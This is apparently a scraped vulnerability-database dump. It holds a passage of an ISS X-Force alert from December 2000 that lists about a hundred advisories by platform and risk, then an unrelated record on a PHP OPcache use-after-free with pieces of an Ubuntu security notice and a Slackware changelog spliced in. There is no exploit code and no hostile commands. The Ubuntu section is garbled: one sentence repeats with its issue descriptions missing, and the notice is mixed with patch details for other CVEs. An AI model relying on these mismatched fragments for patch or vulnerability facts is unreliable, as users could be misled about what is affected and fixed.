X-Force URL: http://xforce.iss.net/static/5815.php
_____
Date Reported: 12/22/00
Vulnerability: iis-web-form-submit
Platforms Affected: IIS (4.0, 5.0)
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IIS Web form submission
X-Force URL: http://xforce.iss.net/static/5823.php
_____
Date Reported: 12/21/00
Vulnerability: hpux-kermit-bo
Platforms Affected: HPUX (10.01, 10.10, 10.20, 11.00)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: HP-UX kermit buffer overflow
X-Force URL: http://xforce.iss.net/static/5793.php
_____
Date Reported: 12/21/00
Vulnerability: bsguest-cgi-execute-commands
Platforms Affected: Linux
Risk Factor: Medium
Attack Type: Network Based
Brief Description: bsguest.cgi allows remote execution of commands on
server
X-Force URL: http://xforce.iss.net/static/5796.php
_____
Date Reported: 12/21/00
Vulnerability: bslist-cgi-execute-commands
Platforms Affected: Linux
Risk Factor: Medium
Attack Type: Network Based
Brief Description: bslist.cgi allows remote execution of commands on
server
X-Force URL: http://xforce.iss.net/static/5797.php
_____
Date Reported: 12/21/00
Vulnerability: infinite-interchange-dos
Platforms Affected: Infinite Interchange 3.61
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Infinite InterChange denial of service
X-Force URL: http://xforce.iss.net/static/5798.php
_____
Date Reported: 12/21/00
Vulnerability: oracle-execute-plsql
Platforms Affected: Oracle Application Server
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Oracle remote procedure execution
X-Force URL: http://xforce.iss.net/static/5817.php
_____
Date Reported: 12/21/00
Vulnerability: ksh-redirection-symlink
Platforms Affected: IRIX (6.2, 6.5.x)
Solaris (2.5.1, 2.6, 7)
HPUX 9.00
Digital Unix 5.0
Risk Factor: High
Attack Type: Host Based
Brief Description: ksh redirection symlink attack
X-Force URL: http://xforce.iss.net/static/5811.php
_____
Date Reported: 12/21/00
Vulnerability: oracle-webdb-admin-access
Platforms Affected: Oracle Internet Application Server 3.0.7
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Oracle IAS allows administrative access
X-Force URL: http://xforce.iss.net/static/5818.php
_____
Date Reported: 12/21/00
Vulnerability: infinite-interchange-dos
Platforms Affected: Infinite Interchange 3.61
Risk Factor: Web Scan
Attack Type: Network/Host Based
Brief Description: Infinite InterChange denial of service
X-Force URL: http://xforce.iss.net/static/5798.php
_____
Date Reported: 12/20/00
Vulnerability: gnupg-detached-sig-modify
Platforms Affected: GnuPG (1.0, 1.0.1, 1.0.2, 1.0.3)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: GnuPG allows users to modify signed messages with
detached signatures
X-Force URL: http://xforce.iss.net/static/5802.php
_____
Date Reported: 12/20/00
Vulnerability: gnupg-reveal-private
Platforms Affected: GnuPG (1.0, 1.0.1, 1.0.2, 1.0.3)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: GnuPG will import private keys along with public
keys
X-Force URL: http://xforce.iss.net/static/5803.php
_____
Date Reported: 12/20/00
Vulnerability: zonealarm-nmap-scans
Platforms Affected: ZoneAlarm
Risk Factor: High
Attack Type: Network Based
Brief Description: ZoneAlarm does not detect NMAP scans
X-Force URL: http://xforce.iss.net/static/5799.php
_____
Date Reported: 12/20/00
Vulnerability: zonealarm-open-shares
Platforms Affected: ZoneAlarm
Risk Factor: High
Attack Type: Network Based
Brief Description: ZoneAlarm open shares
X-Force URL: http://xforce.iss.net/static/5825.php
_____
Date Reported: 12/19/00
Vulnerability: win2k-index-service-activex
Platforms Affected: Windows 2000
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: Windows 2000 Index Service ActiveX controls allow
unauthorized access to file information
X-Force URL: http://xforce.iss.net/static/5800.php
_____
Date Reported: 12/19/00
Vulnerability: proftpd-size-memory-leak
Platforms Affected: Proftpd
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: proftpd memory leak when using SIZE command
X-Force URL: http://xforce.iss.net/static/5801.php
_____
Date Reported: 12/19/00
Vulnerability: weblogic-dot-bo
Platforms Affected: WebLogic
Risk Factor: Medium
Attack Type: Network Based
Brief Description: BEA WebLogic Server "dotdot" URL buffer overflow
X-Force URL: http://xforce.iss.net/static/5782.php
_____
Date Reported: 12/19/00
Vulnerability: mdaemon-imap-dos
Platforms Affected: MDaemon
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: MDaemon IMAP buffer overflow denial of service
X-Force URL: http://xforce.iss.net/static/5805.php
_____
Date Reported: 12/19/00
Vulnerability: zope-calculate-roles
Platforms Affected: Zp[e
Risk Factor: High
Attack Type: Host Based
Brief Description: zope package in Linux calculates local roles
incorrectly
X-Force URL: http://xforce.iss.net/static/5777.php
_____
Date Reported: 12/19/00
Vulnerability: itetris-svgalib-path
Platforms Affected: svgalib
Risk Factor: High
Attack Type: Host Based
Brief Description: Itetris svgalib PATH
X-Force URL: http://xforce.iss.net/static/5795.php
_____
Date Reported: 12/18/00
Vulnerability: bsd-ftpd-replydirname-bo
Platforms Affected: BSD Based Operating Systems
Risk Factor: High
Attack Type: Network Based
Brief Description: BSD ftpd replydirname() function buffer overflow
X-Force URL: http://xforce.iss.net/static/5776.php
_____
Date Reported: 12/18/00
Vulnerability: sonata-command-execute
Platforms Affected: Sonata
Risk Factor: High
Attack Type: Host Based
Brief Description: Sonata argument command line execution
X-Force URL: http://xforce.iss.net/static/5787.php
_____
Date Reported: 12/18/00
Vulnerability: solaris-catman-symlink
Platforms Affected: Solaris
Risk Factor: High
Attack Type: Host Based
Brief Description: Solaris catman command symlink attack
X-Force URL: http://xforce.iss.net/static/5788.php
_____
Date Reported: 12/18/00
Vulnerability: solaris-patchadd-symlink
Platforms Affected: Solaris
Risk Factor: High
Attack Type: Host Based
Brief Description: Solaris patchadd symlink attack
X-Force URL: http://xforce.iss.net/static/5789.php
_____
Date Reported: 12/18/00
Vulnerability: stunnel-format-logfile
Platforms Affected: Stunnel
Risk Factor: High
Attack Type: Network Based
Brief Description: Stunnel format allows user to write to logfile
X-Force URL: http://xforce.iss.net/static/5807.php
_____
Date Reported: 12/17/00
Vulnerability: hp-top-sys-files
Platforms Affected: HPUX
Risk Factor: Low
Attack Type: Host Based
Brief Description: HP-UX top command could be used to overwrite files
X-Force URL: http://xforce.iss.net/static/5773.php
_____
Date Reported: 12/16/00
Vulnerability: zope-legacy-names
Platforms Affected: Zope
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Linux zope package "legacy" names
X-Force URL: http://xforce.iss.net/static/5824.php
_____
Date Reported: 12/15/00
Vulnerability: mrj-runtime-malicious-applets
Platforms Affected: MRJ
Risk Factor: Low
Attack Type: Host Based
Brief Description: MRJ runtime environment could allow malicious
applets to be executed
X-Force URL: http://xforce.iss.net/static/5784.php
_____
Date Reported: 12/14/00
Vulnerability: coffeecup-ftp-weak-encryption
Platforms Affected: CoffeeCup FTP
Risk Factor: Low
Attack Type: Host Based
Brief Description: CoffeeCup FTP client has weak password encryption
X-Force URL: http://xforce.iss.net/static/5744.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-fragmented-packets
Platforms Affected: WatchGuard
Risk Factor: Medium
Attack Type: Network Based
Brief Description: WatchGuard SOHO Firewall fragmented IP packet
attack
X-Force URL: http://xforce.iss.net/static/5749.php
_____
Date Reported: 12/14/00
Vulnerability: jpilot-perms
Platforms Affected: J-Pilot
Risk Factor: Medium
Attack Type: Host Based
Brief Description: J-Pilot permissions could reveal sensitive
information
X-Force URL: http://xforce.iss.net/static/5762.php
_____
Date Reported: 12/14/00
Vulnerability: mediaservices-dropped-connection-dos
Platforms Affected: Microsoft Media Services
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Microsoft Media Services dropped connection denial
of service
X-Force URL: http://xforce.iss.net/static/5785.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-web-auth
Platforms Affected: WatchGuard
Risk Factor: High
Attack Type: Network Based
Brief Description: WatchGuard SOHO Web config server could allow
unauthenticated access
X-Force URL: http://xforce.iss.net/static/5554.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-passcfg-reset
Platforms Affected: WatchGuard
Risk Factor: High
Attack Type: Network Based
Brief Description: WatchGuard SOHO administrator password can be
remotely reset
X-Force URL: http://xforce.iss.net/static/5742.php
_____
Date Reported: 12/14/00
Vulnerability: http-cgi-simplestguest
Platforms Affected: simplestguest.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: simplestguest.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5743.php
_____
Date Reported: 12/14/00
Vulnerability: safeword-palm-pin-extraction
Platforms Affected: SafeWord
e.iD Palm Authenticator
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: SafeWord and e.iD Palm Authenticator allows
attacker to clone Palm device
X-Force URL: http://xforce.iss.net/static/5753.php
_____
Date Reported: 12/14/00
Vulnerability: mdaemon-lock-bypass-password
Platforms Affected: MDaemon
Risk Factor: High
Attack Type: Host Based
Brief Description: MDaemon "lock" bypass password
X-Force URL: http://xforce.iss.net/static/5763.php
_____
Date Reported: 12/13/00
Vulnerability: cisco-catalyst-ssh-mismatch
Platforms Affected: Cisco Catalyst
Risk Factor: Low
Attack Type: Network Based
Brief Description: Cisco Catalyst SSH protocol mismatch
X-Force URL: http://xforce.iss.net/static/5760.php
_____
Date Reported: 12/13/00
Vulnerability: microsoft-iis-file-disclosure
Platforms Affected: IIS
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Microsoft IIS Far East editions file disclosure
X-Force URL: http://xforce.iss.net/static/5729.php
_____
Date Reported: 12/13/00
Vulnerability: ezshopper-cgi-file-disclosure
Platforms Affected: loadpage.cgi
Risk Factor: Medium
Attack Type: Network Based
Brief Description: EZshopper loadpage.cgi file disclosure
X-Force URL: http://xforce.iss.net/static/5740.php
_____
Date Reported: 12/13/00
Vulnerability: winnt-mstask-dos
Platforms Affected: Windows NT
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Windows NT MSTask.exe denial of service
X-Force URL: http://xforce.iss.net/static/5746.php
_____
Date Reported: 12/13/00
Vulnerability: bftpd-site-chown-bo
Platforms Affected: BFTPD
Risk Factor: High
Attack Type: Network Based
Brief Description: BFTPD SITE CHOWN buffer overflow
X-Force URL: http://xforce.iss.net/static/5775.php
_____
Date Reported: 12/12/00
Vulnerability: aim-remote-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: Medium
Attack Type: Network Based
Brief Description: AOL Instant Messenger buffer overflow
X-Force URL: http://xforce.iss.net/static/5732.php
_____
Date Reported: 12/12/00
Vulnerability: subscribemelite-gain-admin-access
Platforms Affected: Subscribe Me Lite
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Subscribe Me Lite mailing list manager
unauthorized access
X-Force URL: http://xforce.iss.net/static/5735.php
_____
Date Reported: 12/12/00
Vulnerability: zope-image-file
Platforms Affected: Zope
Risk Factor: Medium
Attack Type: Host Based
Brief Description: Linux zope package Image and File objects
X-Force URL: http://xforce.iss.net/static/5778.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-everythingform
Platforms Affected: everythingform.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: everythingform.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5736.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-simplestmail
Platforms Affected: simplestmail.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: simplestmail.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5739.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-ad
Platforms Affected: ad.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: ad.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5741.php
_____
Date Reported: 12/12/00
Vulnerability: kde-kmail-weak-encryption
Platforms Affected: KDE KMail
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KDE KMail weak password encryption
X-Force URL: http://xforce.iss.net/static/5761.php
_____
Date Reported: 12/12/00
Vulnerability: aolim-buddyicon-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: AOL Instant Messenger Buddy Icon buffer overflow
X-Force URL: http://xforce.iss.net/static/5786.php
_____
Date Reported: 12/12/00
Vulnerability: aim-remote-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: Medium
Attack Type: Network Based
Brief Description: AOL Instant Messenger buffer overflow
X-Force URL: http://xforce.iss.net/static/5732.php
_____
Date Reported: 12/11/00
Vulnerability: rppppoe-zero-length-dos
Platforms Affected: rp-pppoe
Risk Factor: Medium
Attack Type: Network Based
Brief Description: rp-pppoe "zero-length" option denial of service
X-Force URL: http://xforce.iss.net/static/5727.php
_____
Date Reported: 12/11/00
Vulnerability: proftpd-modsqlpw-unauth-access
Platforms Affected: ProFTPd
Risk Factor: Medium
Attack Type: Network Based
Brief Description: ProFTPD system using mod_sqlpw unauthorized access
X-Force URL: http://xforce.iss.net/static/5737.php
_____
Date Reported: 12/11/00
Vulnerability: gnu-ed-symlink
Platforms Affected: GNU ed
Risk Factor: High
Attack Type: Host Based
Brief Description: GNU ed symlink
X-Force URL: http://xforce.iss.net/static/5723.php
_____
Date Reported: 12/11/00
Vulnerability: oops-ftputils-bo
Platforms Affected: Oops Proxy Server
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Oops Proxy Server ftp_utils buffer overflow
X-Force URL: http://xforce.iss.net/static/5725.php
_____
Date Reported: 12/11/00
Vulnerability: oracle-oidldap-write-permission
Platforms Affected: Oracle Internet Directory
Risk Factor: High
Attack Type: Host Based
Brief Description: Oracle Internet Directory write permission
X-Force URL: http://xforce.iss.net/static/5804.php
_____
Date Reported: 12/9/00
Vulnerability: foolproof-security-bypass
Platforms Affected: FoolProof
Risk Factor: High
Attack Type: Host Based
Brief Description: FoolProof Security restriction bypass using FTP
X-Force URL: http://xforce.iss.net/static/5758.php
_____
Date Reported: 12/8/00
Vulnerability: broadvision-bv1to1-reveal-path
Platforms Affected: BroadVision One-To-One Enterprise Server
Risk Factor: Low
Attack Type: Network Based
Brief Description: BroadVision One-To-One Enterprise Server reveals
path to server
X-Force URL: http://xforce.iss.net/static/5661.php
_____
Date Reported: 12/8/00
Vulnerability: ssldump-format-strings
Platforms Affected: ssldump
Risk Factor: Medium
Attack Type: Network Based
Brief Description: ssldump format string could allow arbitrary
execution of code
X-Force URL: http://xforce.iss.net/static/5717.php
_____
Date Reported: 12/8/00
Vulnerability: coldfusion-sample-dos
Platforms Affected: ColdFusion
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: ColdFusion sample script denial of service
X-Force URL: http://xforce.iss.net/static/5755.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-arbitrary-proxy
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KTH Kerberos 4 arbitrary proxy enviornment
variable
X-Force URL: http://xforce.iss.net/static/5733.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-auth-packet-overflow
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KTH Kerberos 4 authentication packet buffer
overflow
X-Force URL: http://xforce.iss.net/static/5734.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-user-config
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Host Based
Brief Description: KTH Kerberos 4 user supplied configuration files
X-Force URL: http://xforce.iss.net/static/5738.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-tmpfile-dos
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Host Based
Brief Description: KTH Kerberos 4 race condition
X-Force URL: http://xforce.iss.net/static/5754.php
_____
Date Reported: 12/7/00
Vulnerability: homeseer-directory-traversal
Platforms Affected: HomeSeer
Risk Factor: Low
Attack Type: Network Based
Brief Description: HomeSeer allows directory traversal
X-Force URL: http://xforce.iss.net/static/5663.php
_____
Date Reported: 12/7/00
Vulnerability: offline-explorer-reveal-files
Platforms Affected: MetaProducts Offline Explorer
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: MetaProducts Offline Explorer can reveal file
system
X-Force URL: http://xforce.iss.net/static/5728.php
_____
Date Reported: 12/7/00
Vulnerability: imail-smtp-auth-dos
Platforms Affected: IMail
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IMail SMTP auth denial of service
X-Force URL: http://xforce.iss.net/static/5674.php
_____
Date Reported: 12/6/00
Vulnerability: apc-apcupsd-dos
Platforms Affected: APC apcupsd
Risk Factor: Medium
Attack Type: Host Based
Brief Description: APC apcupsd denial of service
X-Force URL: http://xforce.iss.net/static/5654.php
_____
Date Reported: 12/6/00
Vulnerability: cisco-catalyst-telnet-dos
Platforms Affected: Cisco Catalyst
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Cisco Catalyst telnet server memory leak denial of
service
X-Force URL: http://xforce.iss.net/static/5656.php
_____
Date Reported: 12/6/00
Vulnerability: apache-php-disclose-files
Platforms Affected: Apache Web server
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Apache Web server discloses files when used with
php script
X-Force URL: http://xforce.iss.net/static/5659.php
_____
Date Reported: 12/6/00
Vulnerability: ultraseek-reveal-path
Platforms Affected: Ultraseek
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Ultraseek Server can reveal the path and source
code to certain files
X-Force URL: http://xforce.iss.net/static/5660.php
_____
Date Reported: 12/6/00
Vulnerability: irc-dreamforge-dns-dos
Platforms Affected: DreamForge IRCd
Risk Factor: Medium
Attack Type: Network Based
Brief Description: DreamForge IRCd DNS denial of service
X-Force URL: http://xforce.iss.net/static/5721.php
_____
Date Reported: 12/6/00
Vulnerability: mailman-alternate-templates
Platforms Affected: MailMan
Risk Factor: High
Attack Type: Network Based
Brief Description: MailMan Alternate Templates form variable allows
remote attacker to execute commands
X-Force URL: http://xforce.iss.net/static/5649.php
_____
Date Reported: 12/6/00
Vulnerability: phpgroupware-include-files
Platforms Affected:
Risk Factor: High
Attack Type: Network Based
Brief Description: phpGroupWare include files allows remote attacker
to execute commands
X-Force URL: http://xforce.iss.net/static/5650.php
_____
Date Reported: 12/6/00
Vulnerability: markvision-printer-driver-bo
Platforms Affected: Lexmark MarkVision
Risk Factor: High
Attack Type: Host Based
Brief Description: Lexmark MarkVision printer drivers for Unix buffer
overflows
X-Force URL: http://xforce.iss.net/static/5651.php
_____
Date Reported: 12/6/00
Vulnerability: nt-ras-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Host Based
Brief Description: Windows NT RAS registry permissions
X-Force URL: http://xforce.iss.net/static/5671.php
_____
Date Reported: 12/6/00
Vulnerability: nt-snmp-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Windows NT SNMP registry permissions
X-Force URL: http://xforce.iss.net/static/5672.php
_____
Date Reported: 12/6/00
Vulnerability: nt-mts-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Windows NT MTS registry permissions
X-Force URL: http://xforce.iss.net/static/5673.php
_____
Date Reported: 12/6/00
Vulnerability: irc-bitchx-dns-bo
Platforms Affected: BitchX
Risk Factor: High
Attack Type: Network Based
Brief Description: BitchX IRC DNS buffer overflow
X-Force URL: http://xforce.iss.net/static/5701.php
_____
Date Reported: 12/5/00
Vulnerability: ibm-db2-gain-access
Platforms Affected: IBM DB2
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IBM DB2 Universal Database can give access through
default username and password
X-Force URL: http://xforce.iss.net/static/5662.php
_____
Date Reported: 12/5/00
Vulnerability: ibm-db2-dos
Platforms Affected: IBM DB2
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IBM DB2 Universal Database denial of service
X-Force URL: http://xforce.iss.net/static/5664.php
_____
Date Reported: 12/5/00
Vulnerability: vsu-source-routing
Platforms Affected: VSU
Risk Factor: Medium
Attack Type: Network Based
Brief Description: VPNet VSU gateways contain source routing
X-Force URL: http://xforce.iss.net/static/5667.php
_____
Date Reported: 12/5/00
Vulnerability: vsu-ip-bridging
Platforms Affected: VSU
Risk Factor: Medium
Attack Type: Network Based
Brief Description: VPNet VSU gateways contain bridging code
X-Force URL: http://xforce.iss.net/static/5670.php
_____
Date Reported: 12/5/00
Vulnerability: ftp-servu-homedir-travers
Platforms Affected: Serv-U FTP
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: FTP Serv-U home directory traversal could allow
access to FTProot
X-Force URL: http://xforce.iss.net/static/5639.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-web-access
Platforms Affected: CISCO CBOS
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Cisco CBOS Web access enabled denial of service
X-Force URL: http://xforce.iss.net/static/5626.php
_____
Date Reported: 12/4/00
Vulnerability: watchguard-soho-get-dos
Platforms Affected: WatchGuard SOHO
Risk Factor: Medium
Attack Type: Network Based
Brief Description: WatchGuard SOHO Firewall multiple GET requests
denial of service
X-Force URL: http://xforce.iss.net/static/5665.php
_____
Date Reported: 12/4/00
Vulnerability: phone-book-service-bo
Platforms Affected: Windows 2000
Windows NT
Risk Factor: High
Attack Type: Network Based
Brief Description: Windows NT and 2000 Phone Book service buffer
overflow
X-Force URL: http://xforce.iss.net/static/5623.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-syn-packets
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS SYN packets denial of service
X-Force URL: http://xforce.iss.net/static/5627.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-invalid-login
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS does not log invalid logins
X-Force URL: http://xforce.iss.net/static/5628.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-icmp-echo
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS large ICMP ECHO packet denial of
service
X-Force URL: http://xforce.iss.net/static/5629.php
_____
Date Reported: 12/2/00
Vulnerability: phpweblog-bypass-authentication
Platforms Affected: phpWebLog
Risk Factor: High
Attack Type: Host Based
Brief Description: phpWebLog allows users to bypass authentication
X-Force URL: http://xforce.iss.net/static/5625.php
_____
Date Reported: 12/1/00
Vulnerability: linux-diskcheck-race-symlink
Platforms Affected: Linux
Risk Factor: Low
Attack Type: Host Based
Brief Description: Linux diskcheck race condition could allow a tmp
file symbolic link attack
X-Force URL: http://xforce.iss.net/static/5624.php
_____
Date Reported: 12/1/00
Vulnerability: ie-form-file-upload
Platforms Affected: Microsoft Internet Explorer
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Internet Explorer file upload form
X-Force URL: http://xforce.iss.net/static/5615.php
_____
Date Reported: 12/1/00
Vulnerability: mssql-xp-paraminfo-bo
Platforms Affected:
Risk Factor: Medium
Attack Type: Host Based
Brief Description: Microsoft SQL XP srv_paraminfo() buffer overflow
X-Force URL: http://xforce.iss.net/static/5622.php
_____
Date Reported: 12/1/00
Vulnerability: majordomo-auth-execute-commands
Platforms Affected: Majordomo
Risk Factor: High
Attack Type: Network Based
Brief Description: Majordomo allows administrative access without
password
X-Force URL: http://xforce.iss.net/static/5611.php
_____
Date Reported: 12/1/00
Vulnerability: ie-print-template
Platforms Affected: Microsoft Internet Explorer
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Internet Explorer print template
X-Force URL: http://xforce.iss.net/static/5614.php
_____
Date Reported: 12/1/00
Vulnerability: aix-piobe-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX piobe buffer overflow
X-Force URL: http://xforce.iss.net/static/5616.php
_____
Date Reported: 12/1/00
Vulnerability: aix-pioout-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX pioout buffer overflow
X-Force URL: http://xforce.iss.net/static/5617.php
_____
Date Reported: 12/1/00
Vulnerability: aix-setclock-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX setclock buffer overflow
X-Force URL: http://xforce.iss.net/static/5618.php
_____
Date Reported: 12/1/00
Vulnerability: aix-enq-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX enq buffer overflow
X-Force URL: http://xforce.iss.net/static/5619.php
_____
Date Reported: 12/1/00
Vulnerability: aix-digest-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX digest buffer overflow
X-Force URL: http://xforce.iss.net/static/5620.php
_____
Date Reported: 12/1/00
Vulnerability: aix-setsenv-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX setsenv buffer overflow
X-Force URL: http://xforce.iss.net/static/5621.php
Risk Factor Key:
High Any vulnerability that provides an attacker with immediate
access into a machine, gains superuser access, or bypasses
a firewall. Example: A vulnerable Sendmail 8.6.5 version
that allows an intruder to execute commands on mail
server.
Medium Any vulnerability that provides information that has a
high potential of giving system access to an intruder.
Example: A misconfigured TFTP or vulnerable NIS server
that allows an intruder to get the password file that
could contain an account with a guessable password.
Low Any vulnerability that provides information that
potentially could lead to a compromise. Example: A
finger that allows an intruder to find out who is online
and potential accounts to attempt to crack passwords
via brute force methods.
_____
Additional Information
This document is available at http://xforce.iss.net/alerts/advisennn.php.
To receive these Alerts and Advisories:
- - Subscribe to the Alert mailing list from
http://xforce.iss.net/maillists/index.php
- - Or send an email to majordomo@iss.net, and within the body of the
message type:
'subscribe alert' (without the quotes).
About Internet Security Systems (ISS)
Internet Security Systems, Inc. (ISS) (NASDAQ: ISSX) is the leading
global provider of security management solutions for the Internet.
By combining best of breed products, security management services,
aggressive research and development, and comprehensive educational
and consulting services, ISS is the trusted security advisor for
thousands of organizations around the world looking to protect their
mission critical information and networks.
Copyright (c) 2001 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent
of the X-Force. If you wish to reprint the whole or any part of this
Alert in any other medium excluding electronic medium, please e-mail
xforce@iss.net for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as
well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force xforce@iss.net
of Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBOmd8xjRfJiV99eG9AQHGkAQAgX36zVSxItnmE160WG5ws5c6tp0F0Sr0
LLmTWkj7iiYUNv2dKxsw0L4IxItVyilHBYDDrQtjpD76ABE1YhaU2qxlFCeNqMoL
r21MXXYy0JZWfMCU+t7dk7VNtDzy/0EpbZIcBqziisvQJYgUin3viD54QK+gsYIw
jbM10AXVSHw=
=5U+8
-----END PGP SIGNATURE-----
|
|
var-201503-0388
|
Use-after-free vulnerability in the _zend_shared_memdup function in zend_shared_alloc.c in the OPcache extension in PHP through 5.6.7 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. http://cwe.mitre.org/data/definitions/416.htmlService disruption by a third party (DoS) There is a possibility of being affected unspecified, such as being in a state. PHP is prone to a denial-of-service vulnerability due to a user-after-free condition.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. OPcache is one of the extension components that improves PHP performance by storing the precompiled bytecode of PHP scripts in shared memory. ============================================================================
Ubuntu Security Notice USN-2501-1
February 17, 2015
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP. This issue only affected
Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only
affected Ubuntu 14.04 LTS and Ubuntu 14.10.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 14.04 LTS and
Ubuntu 14.10. (CVE-2015-1352)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.2
php5-cgi 5.5.12+dfsg-2ubuntu4.2
php5-cli 5.5.12+dfsg-2ubuntu4.2
php5-fpm 5.5.12+dfsg-2ubuntu4.2
php5-pgsql 5.5.12+dfsg-2ubuntu4.2
Ubuntu 14.04 LTS:
libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.6
php5-cgi 5.5.9+dfsg-1ubuntu4.6
php5-cli 5.5.9+dfsg-1ubuntu4.6
php5-fpm 5.5.9+dfsg-1ubuntu4.6
php5-pgsql 5.5.9+dfsg-1ubuntu4.6
Ubuntu 12.04 LTS:
libapache2-mod-php5 5.3.10-1ubuntu3.16
php5-cgi 5.3.10-1ubuntu3.16
php5-cli 5.3.10-1ubuntu3.16
php5-fpm 5.3.10-1ubuntu3.16
php5-pgsql 5.3.10-1ubuntu3.16
In general, a standard system update will make all the necessary changes.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
This update fixes some security issues.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
